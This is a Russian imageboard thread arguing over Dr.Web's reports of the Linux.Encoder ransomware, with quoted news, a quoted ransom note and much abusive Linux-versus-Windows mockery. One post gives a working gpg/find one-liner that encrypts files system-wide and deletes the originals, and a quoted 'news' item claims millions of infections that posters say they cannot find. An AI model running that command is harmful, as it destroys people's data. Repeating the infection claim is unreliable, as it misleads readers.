Компания "Доктор Веб" сообщила о выявлении вредоносного ПО Linux.Encoder, шифрующего файлы на серверах и требующего заплатить деньги за расшифровку. Программа распространяется в форме троянского ПО для Linux и FreeBSD, требуя для своего размещения эксплуатации неисправленных уязвимостей в серверном ПО или в web-приложениях.
После запуска Linux.Encoder на сервере жертвы производится шифрование файлов, доступных в рамках текущих привилегий доступа. В том числе шифруется содержимое директорий с компонентами web-сайтов, git- и svn-nрепозитории, директории с данными MySQL, файлы конфигурации nginx и apache httpd, содержимое домашней директории, бэкапы и файлы с такими расширениями, как ".php", ".html", ".tar", ".gz", ".sql" и ".js". Зашифрованные файлы снабжаются расширением .encrypted. Условия расшифровки размещаются в файле README_FOR_DECRYPT.txt, который копируется в каждую директорию с зашифрованными данными. Ключ для расшифровки предлагается получить на сайте, работающем в форме скрытого сервиса Tor.
Ну что, пердоляторы, где ваша хвалёная пердобезопасность? Ах, да, ее никогда и не было.
>>1463264 >>1463266 >После запуска с правами администратора троян загружает файлы с требованиями злоумышленников Хотя не надо уже пруфов. ОП хуй просто.
>>1463293 После запуска с правами администратора троянец загружает файлы с требованиями вирусописателей и файл, содержащий путь до публичного RSA-ключа, после чего запускает себя как демон и удаляет исходные файлы.
> Клоуны очередной раз обосрались, пытаясь захейтерить линукс.
Аноним (Microsoft Windows 7: Firefox based)08/11/15 Вск 19:52:53#19№1463301
Олсо, у меня складывается впечатление, что вся эта параша рождается в недрах АНТИВИРУСНЫХ ЛАБОРАТОРИЙ. Видать, чует вендекапец "дохтур еб", прощупывает рынок.
>>1463301 У меня от этого НАКАТИТЬ КАСПЕРСКОГО НА ДЕБИАН.
Аноним (Microsoft Windows 10: Microsoft Edge)08/11/15 Вск 19:54:46#21№1463303
>>1463296 >>1463295 Ого, как быстро пердосектанты в отрицание ушли. Будет запущен без прав администратора - зашифрует всё, до чего дотянется. > производится шифрование файлов, доступных в рамках текущих привилегий доступа
>>1463301 "Лабораторией Рассейский Параноик выявлено вредоносное ПэО, шифрующие файлы на диске. Оно представляет собой скрипт, инсталлирующий и запускающий GnuPG.
README к данной программе представляет собой одну строку строгой инструкции, избежать выполнения которой никому не удалось:
"Root, запусти меня! Я недомая хрень для админов локалхостов и что-то для тебя сделаю!" (c) opennet
Аноним (Linux: New Opera)08/11/15 Вск 19:57:30#27№1463309
>>1463294 Расскажи как он на моем арче окажется. Мне надо самому его запустить, собрать, дать права админа и смотреть как ахуевший сервис моё файло трогает?
кек, клованский высер докторвебцев. Они давно с своим докторвебподелием хотят повесить лапшу на малолетних убунтят, типа без антивируса никак, срочно ставь. Возможно, правдой и неправдой так и заставят убунтодебилов антивирус покупать.
http://vms.drweb.ru/virus/?i=7703983 > После запуска с правами администратора троянец загружает в память своего процесса файлы с требованиями вирусописателей:
>>1463323 > Рекомендации по лечению На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux. http://products.drweb.ru/linux/?lng=ru
>>1463328 его уже лет пять как "втюхивают" - ставил триал версию года четыре назад, имитацию работы создает, а теперь вот какбы и "настоящий вирус" для него придумали, лол
>>1463303 Ну чего ценного у пердолика хранится в home? Ладно там у людей фотографии, документы. У пердолика там в лучшем случае портрет штульмана на рабочий стол.
>>1463386 > пошифрует только пользовательскую папку. Этого же хватит, на систему похуй обычно.
Аноним (Microsoft Windows 7: Firefox based)08/11/15 Вск 20:38:54#67№1463395
>>1463329 > а что про свою шинду-то умолчал? Так ШИФРОВАЛЬЩИКОМ под венду никого не удивишь. Венда это вообще такое помойное ведро с червями и вирусами, каг говорил ленечка наш каганов.
> "После запуска с правами администратора троянец загружает файлы..." Создам пользователя "Администратор", буду под ним работать. И пафосно, и безопасно.
Закэшированный гуглом текст файла (в новость он целиком не попал)
Your personal files are encrypted! Encryption was produced using a unique public key RSA-2048 generated for this computer. To decrypt files you need to obtain the private key.
The single copy of the private key, which will allow to decrypt the files, located on a secret server at the Internet. After that, nobody and never will be able to restore files...
To obtain the private key and php script for this computer, which will automatically decrypt files, you need to pay 1 bitcoin(s) (~240 USD). Without this key, you will never be able to get your original files back.
______________________________________________
!!!!!!!!!!!!!!!!!!!!! PURSE FOR PAYMENT(ALSO AUTHORIZATION CODE): 1zKaz9PpVDuH7CpAeV7FmQyUy25Wq9SeC !!!!!!!!!!!!!!!!!!!!! WEBSITE: https://z54n57pg2el6uze2.onion.to
INSTRUCTION FOR DECRYPT:
After you made payment, you should go to website https://z54n57pg2el6uze2.onion.to Use purse for payment as ur authorization code (1zKaz9PpVDuH7CpAeV7FmQyUy25Wq9SeC). If you already did the payment, you will see decryption pack available for download, inside decryption pack - key and script for decryption, so all what you need just upload and run that script ( for example: http://http://culinae.no/decrypt.php )
Also, at this website you can communicate with our supports and we can help you if you have any troubles, but hope you understand we will not answer at any messages if you not able to pay.
!!!P.S. Our system is fully automatic, after payment you will receive you're decrypt pack IMMEDIATELY!!!
Я придумал пердовирус, суть токова. Это плашка СКОЧАТЬ НОВУЮ СЕРИЮ БИТАВ ПРИСТОЛАВ на вебсайтах с скриптом, который изменяет конфиг ксорга в хомяке, чтобы черный экран при следующей загрузке убунты. Никаких рутов нинада, достаточно поломать настройку.
Аноним (Microsoft Windows 7: Firefox based)08/11/15 Вск 20:42:41#72№1463406
>>1463405 > изменяет конфиг ксорга > Никаких рутов нинада Как так то? Уж лучше создать скрытый файл настроек в домашнем каталоге, который перекроет корневой.
Проигрываю с треда. Пользователи Шиндовс реагирует на новые вирусы равнодушно, так как уже привыкли к ним. А здесь не то что боятся, а даже хотят накатить, проверить и небось отладить его еще.
>>1463415 Wayland еще сырой до ужаса. а и преимуществ по сравнению с иксами не так и много. Плюс свои недостатки имеет. Планировали революцию, а по сути сделали обычную альтернативу. Если оно и взлетит, то только с помощью форса красношляпых.
В общем, CT я не удолаю, пущай повисит, может сделает что-нибудь смешное. Несите там еще поцыэнтов.
В кронтаб вроде ничегой не пропейсалось, усероф не наплодило, заданий ата тоже не насоздавало. >>1463957 Та мало ли. Я и в decrypt что-нибудь веселое воткнул.
Заебали смермодауны, которые плескаются в своём говне из дырок, вирусов, etc, и при этом изо всех сил пытаются найти хоть какой-то фейл в unix'aх, выставляя это как СРЫФ ПАКРОВ, прямо мир выебали, хотя это даже приблизительно не может сравнится с их кривым говном. И мало того, что это само по себе смотрится крайне уныло, так и "проблемы", которые они затрагивают - результат тупости пользователя, а не недоработка системы. И всё это я вижу сразу при заходе в /s/, и это уже даже не смешно, даже не грустно, это убого, заебали.
>>1464143 Прости, я не хотел обидеть. Если тебе нравится виндовс - пользуйся, я ничего не имею против, хорошая наверно ос, не гори пожалуйста, мне стыдно, честно. Добра.
Аноним (Microsoft Windows 8: Firefox based)09/11/15 Пнд 02:02:10#170№1464156
>>1463298 >А запускать левые бинарники будет только спермоклоун и иногда колясочник. Ну почему.Еще тупая прыщеблядь, которая верует: "У меня жи линюкс, это бизапасна!". >>1463309 >Расскажи как он на моем арче окажется. Мне надо самому его запустить, собрать, дать права админа и смотреть как ахуевший сервис моё файло трогает? Нет, все гораздо проще. У тебя запускается exe-файл (или какое там расширение у исполняемых файлов, у вас, прыщеблядей?), ну и.... И собственно и все.
Тред не о чем, запускать левые бинарники только спермачи умеют, в луниксе так не принято.
Аноним (Microsoft Windows 10: New Opera)09/11/15 Пнд 05:15:41#176№1464235
>>1464232 На самом деле всё зависит от пользователя. Я знаю одного пердолю, который любит всякую хуиту запускать, а потом заново накатывать свою бубунточку.
Аноним (Microsoft Windows 7: Firefox based)09/11/15 Пнд 10:24:23#190№1464347
>>1464222 > У тебя запускается exe-файл (или какое там расширение у исполняемых файлов Мы тут эту порноту всем тредом пытались запустить НИВЗЛЕТЕЛО. Похоже, вирос работает только на ИСПЫТАТЕЛЬНОМ СТЕНДЕ лаборатории дохтура еба.
Аноним (Microsoft Windows 10: Microsoft Edge)09/11/15 Пнд 10:25:33#191№1464349
>>1464110 Пердольке больно видеть обосрамс своей питухоси, пердолька хочет потопись тред. Найс.
>>1464347 Двачую, интересно, может им написать что хотим потестить вирос в целях безопасности, может дадут, если нет - то официально объявить их пиздаболами всея двочей
Аноним (Microsoft Windows 7: Firefox based)09/11/15 Пнд 10:39:33#194№1464362
>>1464360 Напиши, мне тоже интересно глянуть. С меня виртуалки виртуалочки.
Аноним (Microsoft Windows 7: Firefox based)09/11/15 Пнд 10:39:40#195№1464364
>>1464340 Не, ну а смысл лезть человеку туда, где он не черта не понимает?
>>1464368 >Я разработчик Доктор Веба >все что написанно в ОП посте правда >получает рута от двойного клика в любой известной версии Gnome >шифрующего файлы на серверах Вот так обосрамс.
Ну в общем-то разницы нет - "виросы" под винду давно уже тоже надо самостоятельно запускать, да ещё и соглашаться дать им права админа в окне УАКа. Не то, чтобы было невозможно написать классический вирус, эксплуатитующий дыры в системе, но это ненужно - гораздо проще и быстрее использовать социальную инженерию, полагаясь на тупость пользователей. И бОльшая "завирусованность" винды объясняется не тем, что она хуже качеством, а лишь тем, что на ней на два порядка больше пользователей, а также тем, что пользоваться пердоликсом и по сей день можно лишь обладая неслабой компьютерной грамотностью, каковая является самым серьёзным барьером на пути любого вироса.
Аноним (Microsoft Windows 7: Firefox based)09/11/15 Пнд 15:39:16#213№1464628
>>1464621 > что она хуже качеством Этим в том числе. И принципами, корни которых уходят в седую древность: НЕ РАБОТАЕТ, ЗАПУСТИ ИЗ-ПОД АДМИНА, ПЕРЕЗАГРУЗИСЬ, ПЕРЕУСТАНОВИ. В итоге, сейчас вообще доходит до маразма с постоянно висящими в бэкраунде антивиросами и UAC, пердящим на каждый чих.
Аноним (Microsoft Windows 7: Chromium based)09/11/15 Пнд 16:06:29#214№1464668
>>1464621 В Винде нет репозиториев - это отдельная большая дырка. Лично знаю людей, которые чтобы найти нужную прогу - просто пишут в ее Гугле и где-то хуй пойми где ее находят. Даже для бесплатного софта, который можно легально получить на официальном сайте.
Аноним (Microsoft Windows 8: Firefox based)09/11/15 Пнд 16:10:02#215№1464675
>>1464628 > ЗАПУСТИ ИЗ-ПОД АДМИНА > UAC, пердящим на каждый чих. Ну да, то-то в пердоликсе что не команда в терминале, то sudo, установка программ через гуй -пожалуйте, вводите пароль (СВОЙ, не рута!), потом еще пароль и ещё.
>>1464621 А еще ты забыл написать, что даже восьмерочка, создает самого первого пользователся прри установке с админ правами. МС сам приучает пользователей сидеть под админом. Если человек сам, уже после инсталла, не решит создать отдельного админа, а своему юзеру понизить привилегии, то так и будет серфить инэт с правами админа, пиздец просто. МС сферические уебки в вакууме.
Аноним (Microsoft Windows 8: Firefox based)09/11/15 Пнд 16:29:56#217№1464730
>>1464718 > создает самого первого пользователся прри установке с админ правами Какой же он нахуй админ, если UAC во все поля? От админа только название.
Аноним (Microsoft Windows 7: Chromium based)09/11/15 Пнд 16:30:34#218№1464732
>>1464675 Нет там таких команд, для которых нужен sudo чтоб они просто работали, но если команда трогает какой-то системный файл, то логично, что ей рут нужен.
Если команды касаются администрирования, то нет ничего удивительного, что потребуются права суперпользователя. Для обычной повседневной работы такие права не нужны ни в гуе ни в консоли.
Аноним (Microsoft Windows 7: Firefox based)09/11/15 Пнд 16:33:36#219№1464742
>>1464675 Не надо смешивать мух и котлет. В юниксоподобных повышение привиллегий требуется строго определенным классом приложений, которым нужен прямой доступ к блочным устройствам, интерфейсам либо общесистемным файлам. При этом, практически любое приложение, которому все это не требуется, может быть установлена в домашний каталог пользователя.
А в винде, а в винде... Давно прошла та эпоха, когда для рабоспособности игрульки, запускать ее требовалось под админом?
На самом деле, причина проста: unix и подобные -- это изначально многопользовательская операционная система. Windows -- однопользовательская.
Аноним (Microsoft Windows 7: Firefox based)09/11/15 Пнд 16:35:32#220№1464747
>>1464730 Ты знаешь, мне эта ситуация с UAC'ом напоминает дурдом: эдак на тебя надевают смирительную рубашку ДЛЯ ТВОЕГО ЖЕ БЛАГА, чтобы не поранился в припадке.
Аноним (Microsoft Windows 8: Firefox based)09/11/15 Пнд 16:38:11#221№1464752
>>1464742 > Давно прошла та эпоха, когда для рабоспособности игрульки, запускать ее требовалось под админом? Вот именно, что прошла.
>требуя для своего размещения эксплуатации неисправленных уязвимостей в серверном ПО или в web-приложениях. Тред закрыт. ОП спермоблядь обосралась как всегда.
Аноним (Microsoft Windows 10: Firefox based)09/11/15 Пнд 18:50:00#223№1464928
>>1463240 (OP) Спрашивается, каким долбоебом надо быть, чтобы скачать, проверить по MD5, скомпилировать, установить и запустить подобную херню.
Сам юзаю GNU/Linux в виртуалке для обучения программированию, никогда не сталкивался с подобным malware и ransomware.
Впрочем, подобный вредоносниый скам рассчитан на тупых долбоебов, не умеющих в а) основы компьютерной грамотности; б) создание резервных копий независимо от операционной системы.
Аноним (Microsoft Windows 8: Firefox based)09/11/15 Пнд 18:55:35#224№1464949
>>1464928 > GNU/Linux > для обучения программированию
Аноним (Microsoft Windows 7: Firefox based)09/11/15 Пнд 19:55:29#226№1465034
а под слакой пойдет или патчить придется?
Аноним (Microsoft Windows 7: Firefox based)09/11/15 Пнд 20:11:40#227№1465069
>>1463299 Мне вот интересно, а как можно не самому запустить исполняемый файл в какой-либо ОС? Система сама их должна детектить, выставлять повышенные права и выполнять?
>>1464134 Столлман залогинься >>1464360 чуваки, а просто баш скрипт вас устроит >>1464391 ебилда >>1464411 хацкеру ничего не надо, он хочет ломать, полностью
ладно всем чмфки в этом треде
Аноним (Microsoft Windows 7: Firefox based)10/11/15 Втр 01:22:29#231№1465578
>>1464752 > Вот именно, что прошла. А привычки остались.
Аноним (Microsoft Windows 7: Firefox based)10/11/15 Втр 01:25:26#232№1465582
>>1465331 > , особенно с кадра который 64 битный статик на 32 битной виртуалке запускал О каг. То есть, мне для запуска ВИРОСА нужно было еще и тридцатидвухбитную систему накатить? Кокая прелесть.
С 1 января 2016 года в госучреждениях и муниципалке РФ будут выпиливать весь иностранный софт, если он имеет отечественные аналоги. Короче - венду из государства выпилят нахуй. Всё. И сразу перестанет закупаться как винда, так и примочки на неё - в том числе те же антивирусы! - а в каждой школе на компах прыщи встанут.
Антивири теряют некислый такой рынок сбыта, и для того, чтобы сохранить бабла, надо что-то предпринять. Вот и вытаскиваются старющие попытки написать вирус под прыщи созданные чисто для того, чтобы показать, что в теории это как бы было бы возможно, если бы не X, Y и Y1, выкладываются как доказательство небезопасности системы и пиздец. Это просто попытка напилить денег в изменившихся условиях, только и всего. Мало ли, может и наебут кого, если не всех.
При этом, что характерно, никто из кудахчащих спермачей выше так и не скинул сам файл вируса. Я бы ради такого с радостью достал бы виртуалку и запустил бы под ней его, записав на видео и выложив пруфы тут. Но нет, будем кудахтать. Идиоты-веруны такие идиоты.
Аноним (Microsoft Windows 8: Firefox based)10/11/15 Втр 10:40:45#236№1465773
>>1465771 > С 1 января 2016 года Сказочка-неотвязочка, эту хуйню уже лет десять обещают, а до сих пор нихуя.
Как стать ОПом успешного, популярного треда? Очень просто, напейши про вирусы для линукса, красноглазики сами набегут и радостно догонят тред до бамплимита. Чур, я следующий тред создаю.
>>1463240 (OP) На любую ОС , на на которую можно установить ПО, - могут быть вирусы . Это истина, от которой нужно отталкиваться в рассуждениях. Linux - не исключение. Разница между OS Windows и Linux в том, что Linux-система менее развитая система, и может быть огромный решетом, в сравнении с OS Windows. Я имею ввиду дыры, которые не требуют установки вируса в систему. Поправьте, если я не прав, хочется быть грамотным в этом вопросе.
Аноним (Microsoft Windows 7: Firefox based)10/11/15 Втр 11:36:11#264№1465835
>>1465834 На самом деле у пиндовс неплохая защита, но клоуны сидят под учеткой админа, ставят мокрые писечки, скачанные хуй знает откуда и чистят майнеры и вирусы целыми днями.
Аноним (Microsoft Windows 7: Firefox based)10/11/15 Втр 11:41:34#268№1465841
>>1465805 >>1465810 Шифровальщик залили через очередную дыру в веб-сервере, у него есть доступ ко всему, к чему у веб-сервера.
>>1465836 >Linux-система менее система развитая система >Поправьте, если я система не прав >Поправил система.
Аноним (Microsoft Windows 8: Firefox based)10/11/15 Втр 11:45:40#271№1465844
>>1465833 Запостил один высер @ Десяток красноглазых маняторят тред, с пеной у рта строча сотни постов и накатывая виртуалки, как будто их выебут в жопу, если они не опровергнут каждый очевидный высер @ Мы абассали ОПа, ниприкидывайся траллем!
А, ну ладно, я просто хотел сказать, не важно, прав ОП, или не прав, но раз вы ведетесь, ты он уже подебил вас. У здоровых людей тред состоял бы из двух постов - ОПовского и "не запускаю неизвестное говно под рутом /тхред". С надеждой на вашу адекватность, покедова. /тхред
>>1465842 >требуя для своего размещения эксплуатации неисправленных уязвимостей в серверном ПО или в web-приложениях >залили через очередную дыру в веб-сервере Всё правильно написал.
Аноним (Microsoft Windows 7: Firefox based)10/11/15 Втр 11:46:53#273№1465846
>>1465842 >сервер на линуксе априори ниуизвим дыр нет Ясно.
>>1465860 Читать журнашлюх, чтобы не нести хуйню? Ты что-то путаешь, в реальном мире всё наоборот: тупачок читает новость, автоматически принимает её содержимое за истину и бежит кудахтать. Примерно как ты.
В линуксе дыр не меньше чем в винде, просто это никто не исследует, так как выгоды в этом никакой нет. Современные вирусы рассчитаны на заработок злоумышленника, а особой выгоды от спизженных учеток веб-сервера нет.
Аноним (Microsoft Windows 7: Firefox based)10/11/15 Втр 21:58:49#287№1466555
>>1464928 > GNU/Linux Чо, прям на гну/линукс сидишь? Как там, в начале 90-х? И ваще, LFS илитней. Не собрал - не мужик!
Аноним (Microsoft Windows 7: Firefox based)10/11/15 Втр 22:01:06#288№1466560
>>1466523 >все сервера на прыщах >выгоды в этом никакой нет Вот это манямирок!
>>1466560 Манямирок только у тебя в голове, чухан, насмотрелся фильмов и думаешь, что злоумышленникам нужны серверы для всякой хуйни. Даже для сраного ддоса эффективнее использоваться пару тысяч узлов с рандомным каналом, нежели сотню с гигабитом.
Аноним (Microsoft Windows 7: Firefox based)11/11/15 Срд 00:37:51#291№1466769
>>1466759 >злоумышленникам нужны серверы для всякой хуйни Точно, на самом деле номера кредиток и персональные данные никому не нужны, не говоря уже о каких-то ссаных процессингах. Кому они нужны, когда можно получать копейки с домашних ПК?
>>1466769 >номера кредиток Ой бляяяяя, вы посмотрите на него. И что ты с этими номерами кредиток сделаешь, уеба? Ты знаешь цены на дампы? 10 долларов за 1000 номеров.
Не иначе как процессинги в твоем манямире работают под управлением postgress? Или, прости господи, mysql?
Аноним (Microsoft Windows 7: Firefox based)11/11/15 Срд 01:17:09#295№1466862
>>1466813 >10 долларов за 1000 номеров. Так я и говорю: сразу ясно, что нахуй миллионные базы никому не нужны. И ПД никому не нужны, таргетированных спам-рассылок и обзвонов давно не существует. И из клиентской базы какого-нибудь эшлимэдисон ни копейки не вытянуть, не говоря уже о разных нищих МММ-щиках и хайперах. Куда лучше с васяновских пентиумов копейки доить, ты абсолютно прав. Нехило гумло на три поста взорвалось.
Уязвимость в вымогательском ПО для Linux/FreeBSD свела стойкость шифрования на нет http://www.opennet.ru/opennews/art.shtml?num=43299 У ПЕРДОЛИКОВ даже ПЕРДОЛОКЕР с уязвимостью. Пиздец ПЕРДОРЕШЕТО на ПЕРДОРЕШЕТЕ.
Аноним (Microsoft Windows 8: Chromium based)11/11/15 Срд 10:45:11#298№1467192
>>1467186 Двачую. То ли дело на сперме - настоящие профессиональные вирусы, никакому касперскому и доктору вебу не под силу победить их. Это ситуация как с ГИМПом и фотошопом.
>>1467186 БГГГГГГГГГГГГГГГГГГГГГГГГГГГГГГГГ Разница между комьюнити СПЕРМОКЛОВАНОВ и линукс-профессионалов налицо. Первые СОСУТ ПРОПРИЕТАРНЫЙ ХУЙ СПЕРМОГОСПОДИНА, вторые берут исходники и всё чинят.
Аноним (Microsoft Windows 7: New Opera)11/11/15 Срд 15:35:08#304№1467439
>>1467186 >Исследователи лаборатории Bitdefender проанализировали недавно анонсированное вымогательское вредоносное ПО Linux.Encoder.1, осуществляющее шифрование данных на серверах с Linux и FreeBSD, и нашли в нём серьёзный промах в организации процесса шифрования, позволяющий расшифровать данные без получения приватного ключа RSA. Результаты анализа послужили основой для написания Python-скрипта, автоматизирующего расшифровку и восстановление данных.
Чото в голос.
Аноним (Microsoft Windows 7: New Opera)11/11/15 Срд 15:40:28#305№1467444
>Кроме того, стали известны подробности поражения серверов вредоносным шифровальщиком. Linux.Encoder.1 проникал в систему эксплуатируя уязвимость в платформе электронной коммерции Magento, позволяющую атакующему выполнить произвольный PHP-код на сервере.
>>1465771 >Я бы ради такого с радостью достал бы виртуалку и запустил бы под ней его, Ну дык. Дохтур еб, между тем, на запрос не звонят и не пишут.
Пришлось самому писать ВИРОС, в параллельном треде уже постил: [CODE] gpg --recv-key 0x31337 && find / -regextype posix-egrep -iregex '.*?(pdf|png|doc|xlsx|jpg|govno|mocha|allah)$' -exec gpg -e --recipient 0x31337 {} \; -delete && echo "UR FUCKED\!\!\!111\n SEND ME YOR MONEY" >$HOME/READ_ME_U_FUGGEN_FAGGOT.TXT [/CODE] >>1465834 Поссал за воротник тупорылой спермобляди.
Аноним (Microsoft Windows 8: Chromium based)11/11/15 Срд 16:14:24#308№1467483
>>1467444 Ну и толку шифовальщику от выполнения пхп кода на сервере? Все равно у нормальных админов для перезаписи важных файлов, будь то код сайта, или база данных, или бекап или что угодно, нужны права рута. С правами вебсервера много не нашифруешь.
Аноним (Microsoft Windows 8: Firefox based)11/11/15 Срд 16:14:35#309№1467484
>сами ничо не делайте, а присылайте нам >мы тут покумекаем канешн, но не факт >но вы все равно купите! >какой-такой decrypter.py? а вот еще один вирус подцепите!
А как вообще можно подхватить болячку на линуксах? Там же все проги через репозитории или исходники ставятся? Всякое кинцо, игры, программы качаю уже 3 года с трекеров, без антивируса, и ничего не подхватил даже на винде
Аноним (Microsoft Windows 10: New Opera)15/11/15 Вск 12:37:27#363№1472325
>>1472312 Очень просто. Васян закидывает говнецо в репозиторий, пердолики это говнецо с успехом устанавливают. Говнецо же никто не будет проверять, ибо все веруют в безопашность жму/пинуса.
Аноним (Microsoft Windows 7: Firefox based)15/11/15 Вск 14:21:22#366№1472439
>>1472425 Реверс пердопорватки не относится к иронии.
Аноним (Microsoft Windows Phone: Internet Explorer)15/11/15 Вск 14:23:34#367№1472441
>>1463395 Сколько ни видел рабочих компов под WinXP, так все годами без проблем работают. И доступ в интернет есть. Только там прав пользователям никто не даёт.
Аноним (Microsoft Windows 10: Firefox based)18/11/15 Срд 10:03:38#371№1476178
А вот и ожидаемое продолжение пердоотсоса.
00:04, 17 ноября 2015 Lenta
Больше не безопасно
Эпидемия вируса "Linux.Encoder", совсем недавно обнаруженного компанией "Dr.Web", стремительно набирает обороты. Проникая в систему с правами обычного пользователя, вредоносная программа зашифровывает файлы в директориях уникальным и крайне стойким энкриптором, после чего владельцу компьютера придётся либо распрощаться со своими данными, либо перевести определённую сумму злоумышленнику за получение "ключа" декриптора. На специальном сайте, созданном автором вируса для демонстрации "успехов" его зловредного детища, уже более трёх миллионов записей от заражённых машин, и количество растёт лавинообразно (для сравнения, ещё неделю назад было опубликовано лишь около 200 компьютеров, успешно подвергнувшихся атаке). Таким образом, уверенность в том, что Linux-системы не подвержены влияниям вирусов, основательно пошатнулось.
Аноним (Microsoft Windows XP: Chromium based)18/11/15 Срд 10:14:33#372№1476183
Появление опасного шифровальщика для ОС Linux, получившего наименование Linux.Encoder.1, всколыхнуло мировую общественность — оказалось, что это семейство операционных систем, всегда считавшееся устойчивым к воздействию вредоносных программ, также подвержено риску заражения энкодерами. Тем не менее, данный троянец оказался не единственным — в последнее время стало известно как минимум еще о двух представителях этой группы шифровальщиков. Специалисты компании «Доктор Веб» готовы поделиться результатами исследования одного из них, получившего наименование Linux.Encoder.2.
Несмотря на то, что данная вредоносная программа была добавлена в вирусные базы Dr.Web под вторым номером, исторически она появилась раньше, однако в течение длительного времени не попадала в поле зрения аналитиков антивирусных компаний. Более того: недавно одна из компаний – разработчиков антивирусного ПО опубликовала исследование другого троянца, названного ею Linux.Encoder.0, — предположительно, он является самым первым в этой группе шифровальщиков, Linux.Encoder.2 начал распространяться чуть позже, в сентябре-октябре 2015 года, а уже затем появился Linux.Encoder.1.
Среди основных отличий этой модификации шифровальщика от Linux.Encoder.1 необходимо отметить то, что она использует другой генератор псевдослучайных чисел, для шифрования применяет библиотеку OpenSSL (а не PolarSSL, как в Linux.Encoder.1), шифрование осуществляет в режиме AES-OFB-128, при этом происходит повторная инициализация контекста каждые 128 байт, то есть через 8 блоков AES. Также в Linux.Encoder.2 имеется ряд других существенных отличий от альтернативной реализации этого энкодера.
Следует также отметить, что все известные на сегодняшний день утилиты, предназначенные для расшифровки файлов, не удаляют внедренный злоумышленниками на инфицированный сервер шелл-скрипт, которым впоследствии могут воспользоваться киберпреступники для повторного заражения системы. Поэтому специалисты службы технической поддержки компании «Доктор Веб» помогают всем обратившимся за помощью в расшифровке файлов пользователям очистить систему от посторонних вредоносных объектов и обезопасить ее от возможных атак с использованием этого скрипта в будущем.
Сигнатура Linux.Encoder.2 добавлена в вирусные базы Антивируса Dr.Web для Linux. Специалисты компании «Доктор Веб» разработали методику расшифровки файлов, поврежденных в результате действия этой вредоносной программы. Если ваши файлы стали недоступны в результате проникновения Linux.Encoder.2, выполните следующие действия:
обратитесь с соответствующим заявлением в полицию; ни в коем случае не пытайтесь каким-либо образом изменить содержимое папок с зашифрованными файлами; не удаляйте никакие файлы на сервере; не пытайтесь восстановить зашифрованные файлы самостоятельно; обратитесь в службу технической поддержки компании «Доктор Веб» (эта услуга бесплатна для пользователей коммерческих лицензий Dr.Web); к тикету приложите любой зашифрованный троянцем файл; дождитесь ответа специалиста службы технической поддержки; в связи с большим количеством запросов это может занять некоторое время.
Напоминаем, что услуги по расшифровке файлов оказываются только обладателям коммерческих лицензий на антивирусные продукты Dr.Web. Компания «Доктор Веб» не дает полной гарантии расшифровки всех поврежденных в результате действия энкодера файлов, однако наши специалисты приложат все усилия, чтобы спасти зашифрованную информацию.
Аноним (Microsoft Windows 7: Firefox based)22/11/15 Вск 14:06:17#386№1481024
>>1481021 Предсмертная агония производителей антивирусов видна невооружённым глазом. Уже просто не знают, как бы хоть сотую часть процента от рынка завоевать — придумали СТРАШНЫЕ ВИРОВСЫ ПОД ЛИНАКС, да ещё и целых ДВЕ ШТУКИ! Срочно всем покупать лицензии.
>>1481631 Ну вот я мимо проходил и прочел этот, с позволения сказать, тред. Итог: Кроме «Dr Web» и нескольких малолетних дебилов из /s никто ни о каком «вирусе» не знает и никто его не видел. Мало того — никому не известно ни одного случая заражения этим загадочным вирусом. Ну, может быть, кроме также никому не известных сотрудников «Dr Web». Наверное это какие-то секретные сотрудники...
Аноним (Microsoft Windows 7: Firefox based)23/11/15 Пнд 01:00:54#399№1481655
>>1481687 > в треде дан линк на сотни тысяч зараженных машин Где ? Первый линк по теме — «По запросу Эпидемия вируса Linux.Encoder site:lenta.ru ничего не найдено. » Вы уж постарайтесь линки пореальнее давать. А то сами себя только клованами выставляете.
Аноним (Microsoft Windows 10: Microsoft Edge)23/11/15 Пнд 11:40:09#403№1481885
>>1490214 На ведроиде, как и на любой пердосистеме, вирусов и до этого была ёбаная тьма. Так что одним больше...
Аноним (Microsoft Windows 7: Chromium based)30/11/15 Пнд 04:58:13#428№1490278
>>1490277 >ёбаная тьма вот где они все? или ты про плей маркет и софт от гугла? что такое вирус на андроид? как он установится, если стоит по дефолту запрет на установку не из маркета
>>1490303 Зато в виндовс-сторе такая ситуация невозможна
Аноним (Microsoft Windows 7: Firefox based)30/11/15 Пнд 13:48:25#432№1490488
>>1490278 Во-первых, в маркет часто всякая хуйня пролезает, пока удалят, уже может успеть понахуячить. Во-вторых, куча людей рутует ведрофоны и ставит всякое левое говно из апк. В-третьих, там даже в прошивках бывает мякотка.
t. владелец андроида с чистым цианом без гуглоговна
Аноним (Microsoft Windows 7: Firefox based)01/12/15 Втр 00:29:21#433№1491366
>>1491366 Все там есть, пердораб. Без вирусни и отменного качества. Прямая противоположность сральному ведру.
Аноним (Microsoft Windows 7: Firefox based)01/12/15 Втр 23:40:46#435№1492533
>>1491459 Ну что без отменного качества-то я видел, но это же неуловимый Джо как он есть, как для девелоперов софта, так и виросов. Не нужно же никому, вон скоро нокия начнёт вёдра выпускать опять и всё, утонет плиткофон навсегда даже со своей йоба-камерой.
>>1492703 > А теперь приведи такойже список для спермы Его просто нет, такого же для спермы. Но гугл в первых строчках выдает http://www.bluerooster.com/about — этого партнера Microsoft
Пердоля загорелась и забавно зашуршала боевыми картиночками. Годы идут, а прыщерабы не меняются (впрочем, как и их пердосистемы, застрявшие в 80-х годах прошлого века).
Аноним (Microsoft Windows 10: Firefox based)03/12/15 Чтв 14:58:39#457№1494894
>>149489 зачем ты так издеваешься над пердосектантом, его же удар хватит
Аноним (Microsoft Windows 7: Firefox based)03/12/15 Чтв 18:24:27#463№1495191
>>1481021 > обнаружен Linux.Encoder.2 > до этого был Linux.Encoder.1 > с самого начала подразумевалась нумерация > Dr.Web первый заявляет о какой-то эпидемии Кокой жырный вброс от доктора. Очевидно, блядь, откуда эти вирусы берутся. Вангую сервера с незакрытыми эксплойтами типа хартблида, на которые менеджеры компании заливали самописные скрипты шифрования.
>>1495384 >под управлением ОС Linux Not this shit again.
Аноним (Microsoft Windows 7: Chromium based)03/12/15 Чтв 23:36:07#466№1495658
>>1463240 (OP) Его ведь руками, из под рута запустить надо, да? Всё, пиздец, сношу на серваке центос, бегу-несу деньги майкрософту.
Аноним (Microsoft Windows 10: Chromium based)04/12/15 Птн 00:02:40#467№1495675
>>1495384 Пердоотсос продолжается. К слову, на примере срального ведра под название "андроид" очень отчётливо видно, какой дырявой парашей являются прыщеподелия, как только пытаются пройти проверку какой-никакой популярностью.
Аноним (Microsoft Windows 8: Firefox based)04/12/15 Птн 00:13:34#468№1495685
